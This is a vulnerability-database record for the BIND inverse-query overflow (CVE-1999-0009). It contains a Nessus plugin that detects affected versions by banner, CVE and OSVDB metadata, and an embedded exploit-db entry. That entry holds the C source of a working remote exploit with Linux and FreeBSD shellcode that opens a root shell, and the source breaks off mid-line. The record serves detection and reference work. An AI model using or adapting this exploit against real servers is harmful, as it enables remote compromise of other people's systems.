ID BIND_IQUERY.NASL Type nessus Reporter This script is Copyright (C) 2002-2018 Tenable Network Security, Inc. Modified 2021-01-02T00:00:00
Description
The remote BIND server, according to its version number, is
vulnerable to an inverse query overflow which could allow an attacker
to execute arbitrary code on the remote host.
#
# (C) Tenable Network Security, Inc.
#
# This script replaces bind_bof.nes
include("compat.inc");
# Registration block: when the scanner loads the plugin with `description`
# set, only the metadata below is registered and the block exits early, so
# the version check further down never runs in that mode.
if (description)
{
script_id(10329);
script_version("1.19");
script_cvs_date("Date: 2018/06/27 18:42:25");
script_cve_id("CVE-1999-0009");
script_bugtraq_id(134);
script_name(english:"ISC BIND < 4.9.7 / 8.1.2 Inverse-Query Remote Overflow");
script_summary(english:"Checks the remote BIND version");
script_set_attribute(attribute:"synopsis", value:
"It is possible to use the remote name server to break into the
remote host." );
script_set_attribute(attribute:"description", value:
"The remote BIND server, according to its version number, is
vulnerable to an inverse query overflow which could allow an attacker
to execute arbitrary code on the remote host." );
script_set_attribute(attribute:"solution", value:
"Upgrade to BIND 8.1.2 or 4.9.7 or newer" );
# CVSS2 10.0: network-reachable, no authentication, complete C/I/A impact.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
# Public exploit code for CVE-1999-0009 has existed since 1998, which is why
# a version match alone is treated as a hole rather than a warning.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2002/04/02");
script_set_attribute(attribute:"vuln_publication_date", value: "1998/04/08");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:isc:bind");
script_end_attributes();
# ACT_GATHER_INFO: the plugin is non-intrusive; it never sends an inverse
# query itself and relies purely on the banner collected by bind_version.nasl.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
script_family(english: "DNS");
# The "bind/version" KB entry is populated by bind_version.nasl; a server
# that does not disclose a parsable version string is simply not assessed
# by this plugin (see the early exit below), which can yield false negatives.
script_dependencie("bind_version.nasl");
script_require_keys("bind/version");
exit(0);
}
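# Version-based check.  The banner comes from bind_version.nasl via the KB;
# with no banner there is nothing to compare, so the plugin exits silently
# (this is a known false-negative path for servers that hide their version).
vers = get_kb_item("bind/version");
if (!vers) exit(0);

# Affected ranges follow the solution text: every 8.x release before 8.1.2
# (8.0.x, 8.1, 8.1.0, 8.1.1) and every 4.x release before 4.9.7.
# The original patterns required a third version component after "8.1" and
# "4.9", so banners such as "8.1-REL", "8.1" or "4.9" (all below the fixed
# releases) were not flagged.  The "1([^0-9.]|$)" / "9([^0-9.]|$)" branches
# cover those forms while still excluding "8.1.2" and "4.9.7"; the trailing
# ".*" is kept from the original patterns.
vuln_8 = "^8\.(0\.|1([^0-9.]|$)|1\.[0-1]([^0-9]|$)).*";
vuln_4 = "^4\.([0-8]([^0-9]|$)|9([^0-9.]|$)|9\.[0-6]([^0-9]|$)).*";

if (ereg(string:vers, pattern:vuln_8) || ereg(string:vers, pattern:vuln_4))
{
  # Report on 53, the port the version banner was collected from.
  security_hole(53);
}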
{"id": "BIND_IQUERY.NASL", "bulletinFamily": "scanner", "title": "ISC BIND < 4.9.7 / 8.1.2 Inverse-Query Remote Overflow", "description": "The remote BIND server, according to its version number, is \nvulnerable to an inverse query overflow which could allow an attacker \nto execute arbitrary code on the remote host.", "published": "2002-04-02T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/10329", "reporter": "This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.", "references": [], "cvelist": ["CVE-1999-0009"], "type": "nessus", "lastseen": "2021-01-01T01:21:57", "edition": 23, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-0009"]}, {"type": "osvdb", "idList": ["OSVDB:913"]}, {"type": "exploitdb", "idList": ["EDB-ID:19112", "EDB-ID:19111"]}, {"type": "nessus", "idList": ["HPUX_PHNE_12957.NASL"]}], "modified": "2021-01-01T01:21:57", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-01-01T01:21:57", "rev": 2}, "vulnersScore": 8.1}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# This script replaces bind_bof.nes\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10329);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-1999-0009\");\n script_bugtraq_id(134);\n \n script_name(english:\"ISC BIND < 4.9.7 / 8.1.2 Inverse-Query Remote Overflow\");\n script_summary(english:\"Checks the remote BIND version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to use the remote name server to break into the\nremote host.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote BIND server, according to its version number, is \nvulnerable to an inverse query overflow which could allow an attacker \nto execute arbitrary code on the remote host.\" );\n 
script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to BIND 8.1.2 or 4.9.7 or newer\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/04/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"1998/04/08\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:isc:bind\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english: \"DNS\");\n script_dependencie(\"bind_version.nasl\");\n script_require_keys(\"bind/version\");\n exit(0);\n}\n\nvers = get_kb_item(\"bind/version\");\nif(!vers)exit(0);\nif(ereg(string:vers,\n\t pattern:\"^8\\.((0\\..*)|(1\\.[0-1]([^0-9]|$))).*\"))security_hole(53);\n\nif(ereg(string:vers,\n \tpattern:\"^4\\.([0-8]\\.|9\\.[0-6]([^0-9]|$)).*\"))security_hole(53);\n\n", "naslFamily": "DNS", "pluginID": "10329", "cpe": ["cpe:/a:isc:bind"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:36:54", "description": "Inverse query buffer overflow in BIND 4.9 and BIND 8 Releases.", "edition": 3, "cvss3": {}, "published": "1998-04-08T04:00:00", "title": "CVE-1999-0009", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0009"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/o:sgi:irix:4.0.5d", "cpe:/a:isc:bind:4.9.6", "cpe:/a:data_general:dg_ux:5.4_4.11", "cpe:/o:redhat:linux:4.2", "cpe:/a:isc:bind:8.1", "cpe:/o:sun:solaris:2.5.1", "cpe:/o:netbsd:netbsd:1.2", "cpe:/o:sgi:irix:3.3.1", "cpe:/o:sgi:irix:4.0.5f", "cpe:/o:sgi:irix:3.3", "cpe:/o:sgi:irix:5.1.1", "cpe:/o:sgi:irix:5.0", "cpe:/o:sgi:irix:4.0.5_iop", "cpe:/a:data_general:dg_ux:5.4_3.0", "cpe:/o:sgi:irix:4.0.5a", "cpe:/o:sgi:irix:4.0.5g", "cpe:/o:ibm:aix:4.1.5", "cpe:/o:sgi:irix:4.0.5", "cpe:/o:sgi:irix:5.3", "cpe:/o:bsdi:bsd_os:2.1", "cpe:/o:nec:asl_ux_4800:64", "cpe:/o:caldera:openlinux:1.0", "cpe:/o:sun:solaris:2.6", "cpe:/o:sgi:irix:4.0.1", "cpe:/o:sgi:irix:4.0.3", "cpe:/o:sgi:irix:4.0.5e", "cpe:/o:sun:sunos:-", "cpe:/o:sgi:irix:4.0.4t", "cpe:/o:redhat:linux:5.0", "cpe:/o:sgi:irix:6.3", "cpe:/o:ibm:aix:4.2", "cpe:/o:netbsd:netbsd:1.3", "cpe:/o:sgi:irix:3.3.2", "cpe:/o:netbsd:netbsd:1.2.1", "cpe:/o:sgi:irix:4.0", "cpe:/o:ibm:aix:4.1.1", "cpe:/a:data_general:dg_ux:5.4_4.1", "cpe:/o:sgi:irix:4.0.1t", "cpe:/o:netbsd:netbsd:1.3.1", "cpe:/o:sgi:irix:4.0.2", "cpe:/o:sgi:irix:5.0.1", "cpe:/o:ibm:aix:4.3", "cpe:/o:sun:sunos:5.5.1", "cpe:/o:sco:unixware:7.0", 
"cpe:/o:sgi:irix:5.1", "cpe:/o:redhat:linux:4.1", "cpe:/o:netbsd:netbsd:1.1", "cpe:/o:ibm:aix:4.1", "cpe:/o:ibm:aix:4.1.2", "cpe:/o:sgi:irix:4.0.4b", "cpe:/o:ibm:aix:4.1.3", "cpe:/o:netbsd:netbsd:1.0", "cpe:/o:bsdi:bsd_os:2.0.1", "cpe:/o:sun:sunos:5.4", "cpe:/o:sun:sunos:5.5", "cpe:/o:sgi:irix:4.0.4", "cpe:/a:isc:bind:8.1.1", "cpe:/o:sgi:irix:4.0.5_ipr", "cpe:/o:bsdi:bsd_os:2.0", "cpe:/o:sco:unixware:2.1", "cpe:/o:ibm:aix:4.1.4", "cpe:/o:redhat:linux:4.0", "cpe:/o:sgi:irix:6.0", "cpe:/o:sgi:irix:5.2", "cpe:/o:sgi:irix:4.0.5h", "cpe:/o:ibm:aix:4.2.1", "cpe:/o:sgi:irix:6.2", "cpe:/o:sco:open_desktop:3.0", "cpe:/o:sco:open_desktop:5.0", "cpe:/o:sun:solaris:2.5", "cpe:/o:sgi:irix:3.3.3", "cpe:/o:sgi:irix:6.1", "cpe:/o:sun:sunos:5.3", "cpe:/a:data_general:dg_ux:5.4_3.1", "cpe:/o:sgi:irix:3.2"], "id": "CVE-1999-0009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0009", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:sgi:irix:4.0.5g:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:-:*:*:*:*:*:*:*", "cpe:2.3:o:sco:unixware:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5_ipr:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.4b:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.2:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:bsdi:bsd_os:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:caldera:openlinux:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:data_general:dg_ux:5.4_4.11:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:sco:open_desktop:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:data_general:dg_ux:5.4_3.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux:4.1:*:*:*:*:*:*:*", 
"cpe:2.3:o:sun:sunos:5.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5d:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5h:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.2:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.6:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5a:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.3:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.4t:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.5.1:*:ppc:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:nec:asl_ux_4800:64:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5_iop:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.1t:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5e:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5f:*:*:*:*:*:*:*", "cpe:2.3:a:data_general:dg_ux:5.4_4.1:*:*:*:*:*:*:*", "cpe:2.3:o:bsdi:bsd_os:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.5.1:*:x86:*:*:*:*:*", "cpe:2.3:o:redhat:linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:data_general:dg_ux:5.4_3.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:4.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.2:*:*:*:*:*:*:*", 
"cpe:2.3:o:sun:solaris:2.5:*:x86:*:*:*:*:*", "cpe:2.3:o:sco:unixware:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.4:*:*:*:*:*:*:*", "cpe:2.3:o:sco:open_desktop:3.0:*:*:*:*:*:*:*", "cpe:2.3:o:bsdi:bsd_os:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.2.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-0009"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA1998-001.txt.asc)\nISS X-Force ID: 895\n[CVE-1999-0009](https://vulners.com/cve/CVE-1999-0009)\nCERT: CA-1998-05\nBugtraq ID: 134\n", "modified": "1998-04-08T00:00:00", "published": "1998-04-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:913", "id": "OSVDB:913", "title": "ISC BIND Inverse-Query Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T11:06:40", "description": "BSDI BSD/OS 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX 5.4 4.11,IBM AIX 4.3,ISC BIND 8.1.1,NetBSD 1.3.1,RedHat Linux 5.0,SCO Open Desktop 3.0/Serv...", "published": "1998-04-08T00:00:00", "type": "exploitdb", "title": "Multiple OSes - BIND Buffer Overflow 1", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0009"], "modified": "1998-04-08T00:00:00", "id": "EDB-ID:19111", "href": "https://www.exploit-db.com/exploits/19111/", "sourceData": "source: http://www.securityfocus.com/bid/134/info\r\n\r\nA buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. 
Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.\r\n\r\nExploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.\r\n\r\n/*\r\n * have fun.\r\n * -ROTShB\r\n */\r\n\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n#include <netdb.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <arpa/inet.h>\r\n#include <arpa/nameser.h>\r\n\r\n#define DEFAULT_TARGET 0\r\n#define DEFAULT_OPTIMIZATION 0\r\n#define DEFAULT_ANBUF_OFFSET 300\r\n#define DLEN_VAL 4\r\n#define NPACKETSZ 512\r\n#define NMAXDNAME 1025\r\n#define PRE_EGG_DATALEN (1+(sizeof(short)*3)+sizeof(long))\r\n#define ALEN_VAL (DLEN_VAL+PRE_EGG_DATALEN)\r\n#define BUFFSIZE 4096\r\n\r\nstruct target_type\r\n{\r\n char desc[40];\r\n int systype;\r\n unsigned long addr;\r\n unsigned long opt_addr;\r\n int fd;\r\n};\r\n\r\nstruct target_type target[] =\r\n{\r\n {\"x86 Linux 2.0.x named 4.9.5-REL (se)\",0,0xbffff21c,0xbffff23c,4},\r\n {\"x86 Linux 2.0.x named 4.9.5-REL (le)\",0,0xbfffeedc,0xbfffeefc,4},\r\n {\"x86 Linux 2.0.x named 4.9.5-P1 (se)\",0,0xbffff294,0xbffff2cc,4},\r\n {\"x86 Linux 2.0.x named 4.9.5-P1 (le)\",0,0xbfffef8c,0xbfffefb4,4},\r\n {\"x86 Linux 2.0.x named 4.9.6-REL (se)\",0,0xbffff3e3,0xbffff403,4},\r\n {\"x86 Linux 2.0.x named 4.9.6-REL (le)\",0,0xbffff188,0xbffff194,4},\r\n {\"x86 Linux 2.0.x named 8.1-REL (se)\",0,0xbffff6a4,0xbffff6f8,5},\r\n {\"x86 Linux 2.0.x named 8.1-REL (le)\",0,0xbffff364,0xbffff3b8,5},\r\n {\"x86 Linux 2.0.x named 8.1.1 (se)\",0,0xbffff6b8,0xbffff708,5},\r\n {\"x86 Linux 2.0.x named 8.1.1 (le)\",0,0xbffff378,0xbffff3c8,5},\r\n {\"x86 FreeBSD 3.x named 4.9.5-REL (se)\",1,0xefbfd260,0xefbfd2c8,4},\r\n {\"x86 FreeBSD 3.x named 4.9.5-REL (le)\",1,0xefbfd140,0xefbfd1a8,4},\r\n {\"x86 FreeBSD 3.x named 4.9.5-P1 
(se)\",1,0xefbfd260,0xefbfd2c8,4},\r\n {\"x86 FreeBSD 3.x named 4.9.5-P1 (le)\",1,0xefbfd140,0xefbfd1a8,4},\r\n {\"x86 FreeBSD 3.x named 4.9.6-REL (se)\",1,0xefbfd480,0xefbfd4e8,4},\r\n {\"x86 FreeBSD 3.x named 4.9.6-REL (le)\",1,0xefbfd218,0xefbfd274,4},\r\n {{0},0,0,0,0}\r\n};\r\n\r\nunsigned long resolve(char *host)\r\n\r\n{\r\n long i;\r\n struct hostent *he;\r\n\r\n if((i=inet_addr(host))==(-1))\r\n if((he=gethostbyname(host))==NULL)\r\n return(0);\r\n else\r\n return(*(unsigned long *)he->h_addr);\r\n\r\n return(i);\r\n}\r\n\r\nint send_packet(int fd, char *buff, int len)\r\n{\r\n char tmp[2], *ptr=tmp;\r\n\r\n PUTSHORT(len,ptr);\r\n\r\n if(write(fd,tmp,2)!=2)\r\n return(-1);\r\n\r\n if(write(fd,buff,len)!=len)\r\n return(-1);\r\n\r\n return(1);\r\n}\r\n\r\nint attack(int fd, struct target_type t, unsigned long offset, int optimized)\r\n{\r\n char buff[BUFFSIZE], *ptr=buff;\r\n HEADER *dnsh=(HEADER *)buff;\r\n unsigned long i;\r\n int dlen, len=0;\r\n\r\n (void)memset(dnsh,0,sizeof(HEADER));\r\n\r\n dnsh->id = htons(31337);\r\n dnsh->opcode = IQUERY;\r\n dnsh->rd = 1;\r\n dnsh->ra = 1;\r\n dnsh->ancount = htons(1);\r\n\r\n ptr += sizeof(HEADER);\r\n len += sizeof(HEADER);\r\n\r\n *ptr = '\\0';\r\n ptr++;\r\n\r\n i = T_A;\r\n PUTSHORT(i,ptr);\r\n\r\n i = C_IN;\r\n PUTSHORT(i,ptr);\r\n\r\n i = 31337;\r\n PUTLONG(i,ptr);\r\n\r\n if(t.systype==0)\r\n {\r\n char c0de[] =\r\n \"\\x31\\xc0\\xb0\\x3f\\x31\\xdb\\xb3\\xff\\x31\\xc9\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\xb1\"\r\n \"\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xeb\\x24\\x5e\\x8d\\x1e\\x89\"\r\n \"\\x5e\\x0b\\x33\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\\xb8\\x1b\\x56\\x34\\x12\\x35\\x10\"\r\n \"\\x56\\x34\\x12\\x8d\\x4e\\x0b\\x8b\\xd1\\xcd\\x80\\x33\\xc0\\x40\\xcd\\x80\\xe8\\xd7\"\r\n \"\\xff\\xff\\xff/bin/sh\";\r\n\r\n if(optimized)\r\n dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;\r\n else\r\n dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;\r\n\r\n PUTSHORT(dlen,ptr);\r\n len += 
PRE_EGG_DATALEN;\r\n\r\n c0de[7] = t.fd;\r\n\r\n (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));\r\n\r\n i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);\r\n (void)memcpy((ptr+i),c0de,sizeof(c0de));\r\n\r\n if(!optimized)\r\n {\r\n (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));\r\n i = ALEN_VAL;\r\n (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));\r\n i = DLEN_VAL;\r\n (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));\r\n }\r\n else\r\n (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));\r\n\r\n i = (optimized?t.opt_addr:t.addr)+offset;\r\n\r\n len += dlen;\r\n }\r\n\r\n\r\n else if(t.systype==1)\r\n {\r\n char c0de[] =\r\n \"\\xeb\\x6e\\x5e\\xc6\\x06\\x9a\\x31\\xc9\\x89\\x4e\\x01\\xc6\\x46\\x05\\x07\\x88\"\r\n \"\\x4e\\x06\\x51\\x31\\xdb\\xb3\\x04\\x53\\x66\\xc7\\x46\\x07\\xeb\\xa7\\x31\\xc0\"\r\n \"\\xb0\\x5a\\x50\\xeb\\x50\\xfe\\xc1\\x51\\x53\\xc6\\x46\\x08\\xb6\\x31\\xc0\\xb0\"\r\n \"\\x5a\\x50\\xeb\\x41\\xfe\\xc1\\x51\\x53\\xc6\\x46\\x08\\xc5\\x31\\xc0\\xb0\\x5a\"\r\n \"\\x50\\xeb\\x32\\xc7\\x46\\x07\\x2f\\x62\\x69\\x6e\\xc7\\x46\\x0b\\x2f\\x73\\x68\"\r\n \"\\x21\\x31\\xc0\\x88\\x46\\x0e\\x8d\\x5e\\x07\\x89\\x5e\\x0f\\x89\\x46\\x13\\x8d\"\r\n \"\\x5e\\x13\\x53\\x8d\\x5e\\x0f\\x53\\x8d\\x5e\\x07\\x53\\xb0\\x3b\\x50\\xeb\\x05\"\r\n \"\\xe8\\x8d\\xff\\xff\\xff\";\r\n\r\n if(optimized)\r\n dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;\r\n else\r\n dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;\r\n\r\n PUTSHORT(dlen,ptr);\r\n len += PRE_EGG_DATALEN;\r\n\r\n c0de[22] = t.fd;\r\n\r\n (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));\r\n\r\n i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);\r\n (void)memcpy((ptr+i),c0de,sizeof(c0de));\r\n\r\n if(!optimized)\r\n {\r\n (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));\r\n i = ALEN_VAL;\r\n (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));\r\n i = DLEN_VAL;\r\n (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));\r\n }\r\n else\r\n 
(void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));\r\n\r\n i = (optimized?t.opt_addr:t.addr)+offset;\r\n (void)memcpy((ptr+(dlen-4)),&i,sizeof(i));\r\n\r\n len += dlen;\r\n }\r\n else\r\n return(0);\r\n\r\n return(send_packet(fd,buff,len));\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n char xbuf[128], ybuf[128];\r\n unsigned long offset=DEFAULT_ANBUF_OFFSET;\r\n int ti, opt=DEFAULT_OPTIMIZATION, sock, i;\r\n int xlen=0, ylen=0;\r\n fd_set rd, wr;\r\n struct sockaddr_in sa;\r\n\r\n for(i=0;((target[i].addr)||(target[i].opt_addr));i++);\r\n\r\n if(argc<2)\r\n {\r\n (void)fprintf(stderr,\"\\ntarget types:\\n\");\r\n\r\n for(ti=0;ti<i;ti++)\r\n (void)fprintf(stderr,\" %-2d : %s\\n\",ti,target[ti].desc);\r\n\r\n (void)fprintf(stderr,\"\\nerror: usage: %s <host> [tt] [opt] [ofst]\\n\",\r\n argv[0]);\r\n exit(-1);\r\n }\r\n\r\n if(argc>2)\r\n {\r\n ti = atoi(argv[2]);\r\n if((ti<0)||(ti>i))\r\n {\r\n (void)fprintf(stderr,\"error: invalid target type %d\\n\",ti);\r\n exit(-1);\r\n }\r\n }\r\n else\r\n ti = DEFAULT_TARGET;\r\n\r\n if(argc>3)\r\n {\r\n opt = atoi(argv[3]);\r\n if((opt!=0)&&(opt!=1))\r\n {\r\n (void)fprintf(stderr,\"error: invalid optimization setting %d\\n\",opt);\r\n exit(-1);\r\n }\r\n }\r\n\r\n if(argc>4)\r\n offset = atoi(argv[4]);\r\n\r\n\r\n if(!(sa.sin_addr.s_addr=resolve(argv[1])))\r\n {\r\n (void)fprintf(stderr,\"error: can not resolve: %s\\n\",argv[1]);\r\n exit(-1);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(53);\r\n\r\n if((sock=socket(sa.sin_family,SOCK_STREAM,0))==(-1))\r\n {\r\n (void)perror(\"error: socket\");\r\n exit(-1);\r\n }\r\n\r\n if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))\r\n {\r\n (void)perror(\"error: connect\");\r\n exit(-1);\r\n }\r\n\r\n (void)printf(\"target : %s\\n\",inet_ntoa(sa.sin_addr));\r\n (void)printf(\"target type : %s\\n\",target[ti].desc);\r\n (void)printf(\"optimized named : %s\\n\",(opt?\"YES\":\"NO\"));\r\n (void)printf(\"anbuff addr : 0x%x\\n\",(unsigned 
